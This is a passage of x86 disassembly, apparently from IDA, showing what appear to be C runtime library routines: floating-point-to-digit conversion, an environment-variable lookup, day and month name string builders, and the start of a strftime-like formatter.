loc_43705C: ; CODE XREF: sub_436F70+B0�j
; sub_436F70+B6�j ...
mov edx, [ebp+var_70]
and edx, 0FFFFh
cmp edx, 7FFFh
jnz loc_437156
mov eax, [ebp+arg_14]
mov word ptr [eax], 1
cmp [ebp+var_24], 80000000h
jnz short loc_437088
cmp [ebp+var_48], 0
jz short loc_4370BC
loc_437088: ; CODE XREF: sub_436F70+110�j
mov ecx, [ebp+var_24]
and ecx, 40000000h
test ecx, ecx
jnz short loc_4370BC
push offset dword_43DF00
mov edx, [ebp+arg_14]
add edx, 4
push edx
call sub_41F620
add esp, 8
mov eax, [ebp+arg_14]
mov byte ptr [eax+3], 6
mov [ebp+var_58], 0
jmp loc_437151
; ---------------------------------------------------------------------------
loc_4370BC: ; CODE XREF: sub_436F70+116�j
; sub_436F70+123�j
mov ecx, [ebp+var_68]
and ecx, 0FFFFh
test ecx, ecx
jz short loc_4370FC
cmp [ebp+var_24], 0C0000000h
jnz short loc_4370FC
cmp [ebp+var_48], 0
jnz short loc_4370FC
push offset dword_43DEF8
mov edx, [ebp+arg_14]
add edx, 4
push edx
call sub_41F620
add esp, 8
mov eax, [ebp+arg_14]
mov byte ptr [eax+3], 5
mov [ebp+var_58], 0
jmp short loc_437151
; ---------------------------------------------------------------------------
loc_4370FC: ; CODE XREF: sub_436F70+157�j
; sub_436F70+160�j ...
cmp [ebp+var_24], 80000000h
jnz short loc_43712F
cmp [ebp+var_48], 0
jnz short loc_43712F
push offset dword_43DEF0
mov ecx, [ebp+arg_14]
add ecx, 4
push ecx
call sub_41F620
add esp, 8
mov edx, [ebp+arg_14]
mov byte ptr [edx+3], 5
mov [ebp+var_58], 0
jmp short loc_437151
; ---------------------------------------------------------------------------
loc_43712F: ; CODE XREF: sub_436F70+193�j
; sub_436F70+199�j
push offset dword_43DEE8
mov eax, [ebp+arg_14]
add eax, 4
push eax
call sub_41F620
add esp, 8
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+3], 6
mov [ebp+var_58], 0
loc_437151: ; CODE XREF: sub_436F70+147�j
; sub_436F70+18A�j ...
jmp loc_43747F
; ---------------------------------------------------------------------------
loc_437156: ; CODE XREF: sub_436F70+FB�j
mov edx, [ebp+var_70]
and edx, 0FFFFh
sar edx, 8
mov word ptr [ebp+var_6C], dx
mov eax, [ebp+var_70]
and eax, 0FFFFh
and eax, 0FFh
mov [ebp+var_C], ax
mov ecx, [ebp+var_24]
shr ecx, 18h
mov word ptr [ebp+var_40], cx
mov edx, [ebp+var_64]
and edx, 0FFFFh
mov eax, [ebp+var_70]
and eax, 0FFFFh
imul edx, eax
mov ecx, [ebp+var_3C]
and ecx, 0FFFFh
mov eax, [ebp+var_6C]
and eax, 0FFFFh
imul ecx, eax
add edx, ecx
mov ecx, [ebp+var_60]
and ecx, 0FFFFh
mov eax, [ebp+var_40]
and eax, 0FFFFh
imul ecx, eax
add edx, ecx
sub edx, [ebp+var_20]
mov [ebp+var_8], edx
mov ecx, [ebp+var_8]
sar ecx, 10h
mov [ebp+var_5C], cx
mov dx, word ptr [ebp+var_70]
mov word ptr [ebp+var_2E], dx
mov eax, [ebp+var_24]
mov [ebp+var_32], eax
mov ecx, [ebp+var_48]
mov [ebp+var_38+2], ecx
mov word ptr [ebp+var_38], 0
push 1
movsx edx, [ebp+var_5C]
neg edx
push edx
lea eax, [ebp+var_38]
push eax
call sub_4395B0
add esp, 0Ch
mov ecx, [ebp+var_2E]
and ecx, 0FFFFh
cmp ecx, 3FFFh
jl short loc_43722D
mov dx, [ebp+var_5C]
add dx, 1
mov [ebp+var_5C], dx
lea eax, [ebp+var_54]
push eax
lea ecx, [ebp+var_38]
push ecx
call sub_439170
add esp, 8
loc_43722D: ; CODE XREF: sub_436F70+29F�j
mov edx, [ebp+arg_14]
mov ax, [ebp+var_5C]
mov [edx], ax
mov ecx, [ebp+arg_10]
and ecx, 1
test ecx, ecx
jz short loc_437281
movsx edx, [ebp+var_5C]
mov eax, [ebp+arg_C]
add eax, edx
mov [ebp+arg_C], eax
cmp [ebp+arg_C], 0
jg short loc_437281
mov ecx, [ebp+arg_14]
mov word ptr [ecx], 0
mov edx, [ebp+arg_14]
mov byte ptr [edx+2], 20h
mov eax, [ebp+arg_14]
mov byte ptr [eax+3], 1
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+4], 30h
mov edx, [ebp+arg_14]
mov byte ptr [edx+5], 0
mov eax, 1
jmp loc_437482
; ---------------------------------------------------------------------------
loc_437281: ; CODE XREF: sub_436F70+2CF�j
; sub_436F70+2E1�j
cmp [ebp+arg_C], 15h
jle short loc_43728E
mov [ebp+arg_C], 15h
loc_43728E: ; CODE XREF: sub_436F70+315�j
mov eax, [ebp+var_2E]
and eax, 0FFFFh
sub eax, 3FFEh
mov [ebp+var_2E+2], eax
mov word ptr [ebp+var_2E], 0
mov [ebp+var_44], 0
jmp short loc_4372B6
; ---------------------------------------------------------------------------
loc_4372AD: ; CODE XREF: sub_436F70+358�j
mov ecx, [ebp+var_44]
add ecx, 1
mov [ebp+var_44], ecx
loc_4372B6: ; CODE XREF: sub_436F70+33B�j
cmp [ebp+var_44], 8
jge short loc_4372CA
lea edx, [ebp+var_38]
push edx
call sub_4361E0
add esp, 4
jmp short loc_4372AD
; ---------------------------------------------------------------------------
loc_4372CA: ; CODE XREF: sub_436F70+34A�j
cmp [ebp+var_2E+2], 0
jge short loc_4372FC
mov eax, [ebp+var_2E+2]
neg eax
and eax, 0FFh
mov [ebp+var_74], eax
jmp short loc_4372E8
; ---------------------------------------------------------------------------
loc_4372DF: ; CODE XREF: sub_436F70+38A�j
mov ecx, [ebp+var_74]
sub ecx, 1
mov [ebp+var_74], ecx
loc_4372E8: ; CODE XREF: sub_436F70+36D�j
cmp [ebp+var_74], 0
jle short loc_4372FC
lea edx, [ebp+var_38]
push edx
call sub_436240
add esp, 4
jmp short loc_4372DF
; ---------------------------------------------------------------------------
loc_4372FC: ; CODE XREF: sub_436F70+35E�j
; sub_436F70+37C�j
mov eax, [ebp+arg_14]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+arg_C]
add ecx, 1
mov [ebp+var_10], ecx
jmp short loc_437319
; ---------------------------------------------------------------------------
loc_437310: ; CODE XREF: sub_436F70+413�j
mov edx, [ebp+var_10]
sub edx, 1
mov [ebp+var_10], edx
loc_437319: ; CODE XREF: sub_436F70+39E�j
cmp [ebp+var_10], 0
jle short loc_437385
mov eax, [ebp+var_38]
mov [ebp+var_1C], eax
mov ecx, [ebp-34h]
mov [ebp+var_18], ecx
mov edx, [ebp+var_32+2]
mov [ebp+var_14], edx
lea eax, [ebp+var_38]
push eax
call sub_4361E0
add esp, 4
lea ecx, [ebp+var_38]
push ecx
call sub_4361E0
add esp, 4
lea edx, [ebp+var_1C]
push edx
lea eax, [ebp+var_38]
push eax
call sub_436130
add esp, 8
lea ecx, [ebp+var_38]
push ecx
call sub_4361E0
add esp, 4
mov edx, [ebp+var_2E+1]
and edx, 0FFh
add edx, 30h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov byte ptr [ebp+var_2E+1], 0
jmp short loc_437310
; ---------------------------------------------------------------------------
loc_437385: ; CODE XREF: sub_436F70+3AD�j
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov cl, [eax]
mov [ebp+var_28], cl
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
movsx eax, [ebp+var_28]
cmp eax, 35h
jl short loc_437403
jmp short loc_4373B3
; ---------------------------------------------------------------------------
loc_4373AA: ; CODE XREF: sub_436F70+45F�j
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
loc_4373B3: ; CODE XREF: sub_436F70+438�j
mov edx, [ebp+arg_14]
add edx, 4
cmp [ebp+var_4], edx
jb short loc_4373D1
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 39h
jnz short loc_4373D1
mov edx, [ebp+var_4]
mov byte ptr [edx], 30h
jmp short loc_4373AA
; ---------------------------------------------------------------------------
loc_4373D1: ; CODE XREF: sub_436F70+44C�j
; sub_436F70+457�j
mov eax, [ebp+arg_14]
add eax, 4
cmp [ebp+var_4], eax
jnb short loc_4373F5
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+arg_14]
mov ax, [edx]
add ax, 1
mov ecx, [ebp+arg_14]
mov [ecx], ax
loc_4373F5: ; CODE XREF: sub_436F70+46A�j
mov edx, [ebp+var_4]
mov al, [edx]
add al, 1
mov ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_43745C
; ---------------------------------------------------------------------------
loc_437403: ; CODE XREF: sub_436F70+436�j
jmp short loc_43740E
; ---------------------------------------------------------------------------
loc_437405: ; CODE XREF: sub_436F70+4B4�j
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
loc_43740E: ; CODE XREF: sub_436F70:loc_437403�j
mov eax, [ebp+arg_14]
add eax, 4
cmp [ebp+var_4], eax
jb short loc_437426
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 30h
jnz short loc_437426
jmp short loc_437405
; ---------------------------------------------------------------------------
loc_437426: ; CODE XREF: sub_436F70+4A7�j
; sub_436F70+4B2�j
mov eax, [ebp+arg_14]
add eax, 4
cmp [ebp+var_4], eax
jnb short loc_43745C
mov ecx, [ebp+arg_14]
mov word ptr [ecx], 0
mov edx, [ebp+arg_14]
mov byte ptr [edx+2], 20h
mov eax, [ebp+arg_14]
mov byte ptr [eax+3], 1
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+4], 30h
mov edx, [ebp+arg_14]
mov byte ptr [edx+5], 0
mov eax, 1
jmp short loc_437482
; ---------------------------------------------------------------------------
loc_43745C: ; CODE XREF: sub_436F70+491�j
; sub_436F70+4BF�j
mov eax, [ebp+arg_14]
add eax, 4
mov ecx, [ebp+var_4]
sub ecx, eax
add ecx, 1
mov edx, [ebp+arg_14]
mov [edx+3], cl
mov eax, [ebp+arg_14]
movsx ecx, byte ptr [eax+3]
mov edx, [ebp+arg_14]
mov byte ptr [edx+ecx+4], 0
loc_43747F: ; CODE XREF: sub_436F70:loc_437151�j
mov eax, [ebp+var_58]
loc_437482: ; CODE XREF: sub_436F70+E7�j
; sub_436F70+30C�j ...
mov esp, ebp
pop ebp
retn
sub_436F70 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push 0Ch
call sub_423280
add esp, 4
mov eax, [ebp+8]
push eax
call sub_4374C0
add esp, 4
mov [ebp-4], eax
push 0Ch
call sub_423320
add esp, 4
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4374C0 proc near ; CODE XREF: sub_433090+3A�p
; _0:004374A2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, ds:dword_4F3314
mov [ebp+var_8], eax
cmp ds:dword_4F4A28, 0
jnz short loc_4374DE
xor eax, eax
jmp loc_437582
; ---------------------------------------------------------------------------
loc_4374DE: ; CODE XREF: sub_4374C0+15�j
cmp [ebp+var_8], 0
jnz short loc_437506
cmp ds:dword_4F331C, 0
jz short loc_437506
call sub_4396D0
test eax, eax
jz short loc_4374FD
xor eax, eax
jmp loc_437582
; ---------------------------------------------------------------------------
loc_4374FD: ; CODE XREF: sub_4374C0+34�j
mov ecx, ds:dword_4F3314
mov [ebp+var_8], ecx
loc_437506: ; CODE XREF: sub_4374C0+22�j
; sub_4374C0+2B�j
cmp [ebp+var_8], 0
jz short loc_437580
cmp [ebp+arg_0], 0
jz short loc_437580
mov edx, [ebp+arg_0]
push edx
call sub_41BC70
add esp, 4
mov [ebp+var_4], eax
loc_437521: ; CODE XREF: sub_4374C0+BE�j
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jz short loc_437580
mov ecx, [ebp+var_8]
mov edx, [ecx]
push edx
call sub_41BC70
add esp, 4
cmp eax, [ebp+var_4]
jbe short loc_437575
mov eax, [ebp+var_8]
mov ecx, [eax]
mov edx, [ebp+var_4]
movsx eax, byte ptr [ecx+edx]
cmp eax, 3Dh
jnz short loc_437575
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_8]
mov ecx, [eax]
push ecx
call sub_439680
add esp, 0Ch
test eax, eax
jnz short loc_437575
mov edx, [ebp+var_8]
mov eax, [edx]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx+1]
jmp short loc_437582
; ---------------------------------------------------------------------------
loc_437575: ; CODE XREF: sub_4374C0+7A�j
; sub_4374C0+8B�j ...
mov edx, [ebp+var_8]
add edx, 4
mov [ebp+var_8], edx
jmp short loc_437521
; ---------------------------------------------------------------------------
loc_437580: ; CODE XREF: sub_4374C0+4A�j
; sub_4374C0+50�j ...
xor eax, eax
loc_437582: ; CODE XREF: sub_4374C0+19�j
; sub_4374C0+38�j ...
mov esp, ebp
pop ebp
retn
sub_4374C0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
mov eax, ds:off_454D28
mov [ebp-0Ch], eax
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-10h], 0
jmp short loc_4375B8
; ---------------------------------------------------------------------------
loc_4375AF: ; CODE XREF: _0:004375EF�j
mov ecx, [ebp-10h]
add ecx, 1
mov [ebp-10h], ecx
loc_4375B8: ; CODE XREF: _0:004375AD�j
cmp dword ptr [ebp-10h], 7
jnb short loc_4375F1
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4]
push ecx
call sub_41BC70
add esp, 4
mov esi, eax
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4+1Ch]
push ecx
call sub_41BC70
add esp, 4
add eax, [ebp-8]
lea edx, [eax+esi+2]
mov [ebp-8], edx
jmp short loc_4375AF
; ---------------------------------------------------------------------------
loc_4375F1: ; CODE XREF: _0:004375BC�j
mov eax, [ebp-8]
add eax, 1
push eax
call sub_41BE40
add esp, 4
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_4376A9
mov ecx, [ebp-4]
mov [ebp-14h], ecx
mov dword ptr [ebp-10h], 0
jmp short loc_437625
; ---------------------------------------------------------------------------
loc_43761C: ; CODE XREF: _0:00437698�j
mov edx, [ebp-10h]
add edx, 1
mov [ebp-10h], edx
loc_437625: ; CODE XREF: _0:0043761A�j
cmp dword ptr [ebp-10h], 7
jnb short loc_43769A
mov eax, [ebp-14h]
mov byte ptr [eax], 3Ah
mov ecx, [ebp-14h]
add ecx, 1
mov [ebp-14h], ecx
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4]
push ecx
mov edx, [ebp-14h]
push edx
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov ecx, [ebp-14h]
add ecx, eax
mov [ebp-14h], ecx
mov edx, [ebp-14h]
mov byte ptr [edx], 3Ah
mov eax, [ebp-14h]
add eax, 1
mov [ebp-14h], eax
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+1Ch]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov edx, [ebp-14h]
add edx, eax
mov [ebp-14h], edx
jmp short loc_43761C
; ---------------------------------------------------------------------------
loc_43769A: ; CODE XREF: _0:00437629�j
mov eax, [ebp-14h]
mov byte ptr [eax], 0
mov ecx, [ebp-14h]
add ecx, 1
mov [ebp-14h], ecx
loc_4376A9: ; CODE XREF: _0:00437607�j
mov eax, [ebp-4]
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
mov eax, ds:off_454D28
mov [ebp-0Ch], eax
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-10h], 0
jmp short loc_4376E8
; ---------------------------------------------------------------------------
loc_4376DF: ; CODE XREF: _0:00437720�j
mov ecx, [ebp-10h]
add ecx, 1
mov [ebp-10h], ecx
loc_4376E8: ; CODE XREF: _0:004376DD�j
cmp dword ptr [ebp-10h], 0Ch
jnb short loc_437722
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4+38h]
push ecx
call sub_41BC70
add esp, 4
mov esi, eax
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4+68h]
push ecx
call sub_41BC70
add esp, 4
add eax, [ebp-8]
lea edx, [eax+esi+2]
mov [ebp-8], edx
jmp short loc_4376DF
; ---------------------------------------------------------------------------
loc_437722: ; CODE XREF: _0:004376EC�j
mov eax, [ebp-8]
add eax, 1
push eax
call sub_41BE40
add esp, 4
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_4377DB
mov ecx, [ebp-4]
mov [ebp-14h], ecx
mov dword ptr [ebp-10h], 0
jmp short loc_437756
; ---------------------------------------------------------------------------
loc_43774D: ; CODE XREF: _0:004377CA�j
mov edx, [ebp-10h]
add edx, 1
mov [ebp-10h], edx
loc_437756: ; CODE XREF: _0:0043774B�j
cmp dword ptr [ebp-10h], 0Ch
jnb short loc_4377CC
mov eax, [ebp-14h]
mov byte ptr [eax], 3Ah
mov ecx, [ebp-14h]
add ecx, 1
mov [ebp-14h], ecx
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4+38h]
push ecx
mov edx, [ebp-14h]
push edx
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov ecx, [ebp-14h]
add ecx, eax
mov [ebp-14h], ecx
mov edx, [ebp-14h]
mov byte ptr [edx], 3Ah
mov eax, [ebp-14h]
add eax, 1
mov [ebp-14h], eax
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+68h]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov edx, [ebp-14h]
add edx, eax
mov [ebp-14h], edx
jmp short loc_43774D
; ---------------------------------------------------------------------------
loc_4377CC: ; CODE XREF: _0:0043775A�j
mov eax, [ebp-14h]
mov byte ptr [eax], 0
mov ecx, [ebp-14h]
add ecx, 1
mov [ebp-14h], ecx
loc_4377DB: ; CODE XREF: _0:00437738�j
mov eax, [ebp-4]
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, ds:off_454D28
mov [ebp-0Ch], eax
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-10h], 0
jmp short loc_437818
; ---------------------------------------------------------------------------
loc_43780F: ; CODE XREF: _0:0043784F�j
mov ecx, [ebp-10h]
add ecx, 1
mov [ebp-10h], ecx
loc_437818: ; CODE XREF: _0:0043780D�j
cmp dword ptr [ebp-10h], 7
jnb short loc_437851
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4]
push ecx
call sub_41BC70
add esp, 4
mov esi, eax
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4+1Ch]
push ecx
call sub_41BC70
add esp, 4
add eax, [ebp-8]
lea edx, [eax+esi+2]
mov [ebp-8], edx
jmp short loc_43780F
; ---------------------------------------------------------------------------
loc_437851: ; CODE XREF: _0:0043781C�j
mov dword ptr [ebp-10h], 0
jmp short loc_437863
; ---------------------------------------------------------------------------
loc_43785A: ; CODE XREF: _0:0043789B�j
mov eax, [ebp-10h]
add eax, 1
mov [ebp-10h], eax
loc_437863: ; CODE XREF: _0:00437858�j
cmp dword ptr [ebp-10h], 0Ch
jnb short loc_43789D
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+38h]
push eax
call sub_41BC70
add esp, 4
mov esi, eax
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+68h]
push eax
call sub_41BC70
add esp, 4
add eax, [ebp-8]
lea ecx, [eax+esi+2]
mov [ebp-8], ecx
jmp short loc_43785A
; ---------------------------------------------------------------------------
loc_43789D: ; CODE XREF: _0:00437867�j
mov edx, [ebp-0Ch]
mov eax, [edx+98h]
push eax
call sub_41BC70
add esp, 4
mov esi, eax
mov ecx, [ebp-0Ch]
mov edx, [ecx+9Ch]
push edx
call sub_41BC70
add esp, 4
add eax, [ebp-8]
lea eax, [eax+esi+2]
mov [ebp-8], eax
mov ecx, [ebp-0Ch]
mov edx, [ecx+0A0h]
push edx
call sub_41BC70
add esp, 4
mov ecx, [ebp-8]
lea edx, [ecx+eax+1]
mov [ebp-8], edx
mov eax, [ebp-0Ch]
mov ecx, [eax+0A4h]
push ecx
call sub_41BC70
add esp, 4
mov edx, [ebp-8]
lea eax, [edx+eax+1]
mov [ebp-8], eax
mov ecx, [ebp-0Ch]
mov edx, [ecx+0A8h]
push edx
call sub_41BC70
add esp, 4
mov ecx, [ebp-8]
lea edx, [ecx+eax+1]
mov [ebp-8], edx
mov eax, [ebp-8]
add eax, 0ACh
push eax
call sub_41BE40
add esp, 4
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_437B56
mov ecx, [ebp-4]
mov [ebp-18h], ecx
mov edx, [ebp-4]
add edx, 0ACh
mov [ebp-14h], edx
push 0ACh
mov eax, ds:off_454D28
push eax
mov ecx, [ebp-4]
push ecx
call sub_41FBF0
add esp, 0Ch
mov dword ptr [ebp-10h], 0
jmp short loc_43797A
; ---------------------------------------------------------------------------
loc_437971: ; CODE XREF: _0:004379EC�j
mov edx, [ebp-10h]
add edx, 1
mov [ebp-10h], edx
loc_43797A: ; CODE XREF: _0:0043796F�j
cmp dword ptr [ebp-10h], 7
jnb short loc_4379EE
mov eax, [ebp-10h]
mov ecx, [ebp-18h]
mov edx, [ebp-14h]
mov [ecx+eax*4], edx
mov eax, [ebp-10h]
mov ecx, [ebp-0Ch]
mov edx, [ecx+eax*4]
push edx
mov eax, [ebp-14h]
push eax
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov ecx, [ebp-14h]
lea edx, [ecx+eax+1]
mov [ebp-14h], edx
mov eax, [ebp-10h]
mov ecx, [ebp-18h]
mov edx, [ebp-14h]
mov [ecx+eax*4+1Ch], edx
mov eax, [ebp-10h]
mov ecx, [ebp-0Ch]
mov edx, [ecx+eax*4+1Ch]
push edx
mov eax, [ebp-14h]
push eax
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov ecx, [ebp-14h]
lea edx, [ecx+eax+1]
mov [ebp-14h], edx
jmp short loc_437971
; ---------------------------------------------------------------------------
loc_4379EE: ; CODE XREF: _0:0043797E�j
mov dword ptr [ebp-10h], 0
jmp short loc_437A00
; ---------------------------------------------------------------------------
loc_4379F7: ; CODE XREF: _0:00437A74�j
mov eax, [ebp-10h]
add eax, 1
mov [ebp-10h], eax
loc_437A00: ; CODE XREF: _0:004379F5�j
cmp dword ptr [ebp-10h], 0Ch
jnb short loc_437A76
mov ecx, [ebp-10h]
mov edx, [ebp-18h]
mov eax, [ebp-14h]
mov [edx+ecx*4+38h], eax
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+38h]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov edx, [ebp-14h]
lea eax, [edx+eax+1]
mov [ebp-14h], eax
mov ecx, [ebp-10h]
mov edx, [ebp-18h]
mov eax, [ebp-14h]
mov [edx+ecx*4+68h], eax
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+68h]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov edx, [ebp-14h]
lea eax, [edx+eax+1]
mov [ebp-14h], eax
jmp short loc_4379F7
; ---------------------------------------------------------------------------
loc_437A76: ; CODE XREF: _0:00437A04�j
mov ecx, [ebp-18h]
mov edx, [ebp-14h]
mov [ecx+98h], edx
mov eax, [ebp-0Ch]
mov ecx, [eax+98h]
push ecx
mov edx, [ebp-14h]
push edx
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov ecx, [ebp-14h]
lea edx, [ecx+eax+1]
mov [ebp-14h], edx
mov eax, [ebp-18h]
mov ecx, [ebp-14h]
mov [eax+9Ch], ecx
mov edx, [ebp-0Ch]
mov eax, [edx+9Ch]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov edx, [ebp-14h]
lea eax, [edx+eax+1]
mov [ebp-14h], eax
mov ecx, [ebp-18h]
mov edx, [ebp-14h]
mov [ecx+0A0h], edx
mov eax, [ebp-0Ch]
mov ecx, [eax+0A0h]
push ecx
mov edx, [ebp-14h]
push edx
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov ecx, [ebp-14h]
lea edx, [ecx+eax+1]
mov [ebp-14h], edx
mov eax, [ebp-18h]
mov ecx, [ebp-14h]
mov [eax+0A4h], ecx
mov edx, [ebp-0Ch]
mov eax, [edx+0A4h]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_41F620
add esp, 8
push eax
call sub_41BC70
add esp, 4
mov edx, [ebp-14h]
lea eax, [edx+eax+1]
mov [ebp-14h], eax
mov ecx, [ebp-18h]
mov edx, [ebp-14h]
mov [ecx+0A8h], edx
loc_437B56: ; CODE XREF: _0:00437939�j
mov eax, [ebp-4]
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_437B80
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_437B80 proc near ; CODE XREF: _0:00437B75�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
push offset dword_4F37C8
call ds:dword_4F5488 ; InterlockedIncrement
cmp ds:dword_4F37C4, 0
jz short loc_437BBE
push offset dword_4F37C8
call ds:dword_4F5484 ; InterlockedDecrement
push 13h
call sub_423280
add esp, 4
mov [ebp+var_8], 1
jmp short loc_437BC5
; ---------------------------------------------------------------------------
loc_437BBE: ; CODE XREF: sub_437B80+1E�j
mov [ebp+var_8], 0
loc_437BC5: ; CODE XREF: sub_437B80+3C�j
cmp [ebp+arg_10], 0
jnz short loc_437BD6
mov ecx, ds:off_454D28
mov [ebp+var_10], ecx
jmp short loc_437BDC
; ---------------------------------------------------------------------------
loc_437BD6: ; CODE XREF: sub_437B80+49�j
mov edx, [ebp+arg_10]
mov [ebp+var_10], edx
loc_437BDC: ; CODE XREF: sub_437B80+54�j
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
loc_437BE2: ; CODE XREF: sub_437B80:loc_437CCE�j
cmp [ebp+var_C], 0
jbe loc_437CD3
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [ebp+var_14], dl
cmp [ebp+var_14], 0
jz short loc_437C02
cmp [ebp+var_14], 25h
jz short loc_437C07
jmp short loc_437C61
; ---------------------------------------------------------------------------
loc_437C02: ; CODE XREF: sub_437B80+78�j
jmp loc_437CD3
; ---------------------------------------------------------------------------
loc_437C07: ; CODE XREF: sub_437B80+7E�j
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
mov ds:dword_4F36A0, 0
mov ecx, [ebp+arg_8]
movsx edx, byte ptr [ecx]
cmp edx, 23h
jnz short loc_437C38
mov ds:dword_4F36A0, 1
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
loc_437C38: ; CODE XREF: sub_437B80+A3�j
mov ecx, [ebp+var_4]
push ecx
lea edx, [ebp+var_C]
push edx
lea eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
mov al, [edx]
push eax
call sub_437D10
add esp, 14h
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
jmp short loc_437CCE
; ---------------------------------------------------------------------------
loc_437C61: ; CODE XREF: sub_437B80+80�j
mov edx, [ebp+arg_8]
xor eax, eax
mov al, [edx]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_437CA9
cmp [ebp+var_C], 1
jbe short loc_437CA9
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
loc_437CA9: ; CODE XREF: sub_437B80+FC�j
; sub_437B80+102�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_0]
add eax, 1
